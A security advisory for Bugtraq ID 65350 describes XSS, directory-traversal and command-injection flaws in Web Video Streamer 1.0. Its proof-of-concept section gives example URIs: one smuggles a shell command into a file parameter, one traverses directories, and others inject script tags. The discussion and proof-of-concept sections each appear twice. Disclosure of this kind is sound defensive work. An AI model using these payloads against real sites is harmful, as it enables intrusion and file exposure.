Web Video Streamer Multiple Security Vulnerabilities
BID:65350
Info
Web Video Streamer Multiple Security Vulnerabilities
| Bugtraq ID: | 65350 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 22 2014 12:00AM |
| Updated: | Jan 22 2014 12:00AM |
| Credit: | Eric Sesterhenn |
| Vulnerable: |
Oliver Leitner Web Video Streamer 1.0 |
| Not Vulnerable: |
Oliver Leitner Web Video Streamer 1.1 |
Discussion
Web Video Streamer Multiple Security Vulnerabilities
Web Video Streamer is prone to following multiple security vulnerabilities:
1. Multiple cross-site scripting vulnerabilities
2. A directory-traversal vulnerability
3. A command-injection vulnerability
A remote attacker can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and gain access to sensitive information, which may aid in launching further attacks.
Web Video Streamer 1.0 is vulnerable; other versions may also be affected.
Web Video Streamer is prone to following multiple security vulnerabilities:
1. Multiple cross-site scripting vulnerabilities
2. A directory-traversal vulnerability
3. A command-injection vulnerability
A remote attacker can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and gain access to sensitive information, which may aid in launching further attacks.
Web Video Streamer 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
Web Video Streamer Multiple Security Vulnerabilities
Attackers can exploit the cross-site scripting issue by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/webstreamer-master/player.php?name=drops.avi&file=drop.avi';ls>/tmp/foo;a'&type=video/mp4&t=1389685059
http://www.example.com/webstreamer-master/index.php?dir=../../../ XSS:
http://www.example.com/webstreamer-master/player.php?name=%3Cscript%3Ealert%281%29%3C/script%3Etest
http://www.example.com/webstreamer-master/index.php?dir=../../%3Cscript%3Ealert%281%29%3C/script%3E
Attackers can exploit the cross-site scripting issue by enticing an unsuspecting user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/webstreamer-master/player.php?name=drops.avi&file=drop.avi';ls>/tmp/foo;a'&type=video/mp4&t=1389685059
http://www.example.com/webstreamer-master/index.php?dir=../../../ XSS:
http://www.example.com/webstreamer-master/player.php?name=%3Cscript%3Ealert%281%29%3C/script%3Etest
http://www.example.com/webstreamer-master/index.php?dir=../../%3Cscript%3Ealert%281%29%3C/script%3E